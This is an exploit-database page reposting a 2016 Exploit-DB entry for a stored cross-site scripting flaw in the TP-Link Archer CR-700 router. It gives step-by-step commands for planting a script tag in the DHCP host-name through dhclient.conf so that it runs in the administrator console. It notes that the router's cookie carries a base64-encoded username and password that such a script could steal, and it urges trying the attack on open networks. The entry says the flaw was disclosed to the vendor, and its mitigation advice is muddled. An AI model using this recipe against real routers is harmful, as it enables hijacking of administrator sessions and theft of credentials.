header-logo
Suggest Exploit
vendor:
Archer CR-700
by:
Ayushman Dutta
3,1
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Archer CR-700
Affected Version From: 1.0.6
Affected Version To: 1.0.6
Patch Exists: YES
Related CWE: N/A
CPE: h:tp-link:archer_cr700
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2016

TP-Link Archer CR-700 XSS vulnerability

Exploiting TP-Link Archer CR-700 Router. On a Linux machine, the user can comment out the line 'send host-name = gethostname();' and change the gethostname() function to an XSS script like '<script>alert(5)</script>'. Then, the user can send a DHCP request to the router to receive an IP address with the command 'dhclient -v -i wlan0'. On logging in, the XSS script executes. Additionally, the router does not have a CSRF token, so the cookie set by the router can be stolen using an XSS script.

Mitigation:

The user should ensure that the gethostname() function is not changed to an XSS script. Additionally, the router should be updated with a CSRF token.
Source

Exploit-DB raw data:

# Exploit Title: TP-Link Archer CR-700 XSS vulnerability
# Google Dork: N/A
# Date: 09/07/2016
# Exploit Author: Ayushman Dutta
# Vendor Homepage: http://www.tp-link.us/
# Software Link: N/A
# Version: 1.0.6 (REQUIRED)
# Tested on: Linux
# CVE : N/A
#Exploit Information:
https://github.com/ayushman4/TP-Link-Archer-CR-700-XSS-Exploit/blob/master/README.md

TP-Link-Archer-CR-700-XSS-Exploit

Exploiting TP-Link Archer CR-700 Router. (Responsibly Disclosed to TP-Link)

Step 1-> On you linux machine (Kali or Ubuntu) type the following command

gedit /etc/dhcp/dhclient.conf

Comment out the line below
send host-name = gethostname();

Copy it to the line below it and change the gethostname() function to an XSS script like below.

send host-name = "<script>alert(5)</script>";

Step 2:Restart your linux system so that the changes takes into effect.

Step 3: Send a DHCP request to the router to receive an IP address with the command below.(Try this on any open network routers which is using TP-Link Archer CR-700)

dhclient -v -i wlan0

On running the command above, it send a DHCP request to the router. On a DHCP request, the host name is sent to which we have forcibly set it to an XSS script <script>alert(5)</script>

Step 4: Login to the administrator console.

On logging in the Script executes.

One more issue that I saw in the router that was that there was no CSRF token. The cookie set by the router contains a base64 encoded username & password whcih can be stolen using an XSS script.

Note:All The above information has been disclosed to TP-Link, who have reporduced the problem and passed it to their R&D team to fix the issue.

A URL to the product https://www.amazon.com/Wireless-Certified-Cablevision-Archer-CR700/dp/B012I96J3W

Navigation

Suggest Exploit

Services By CQR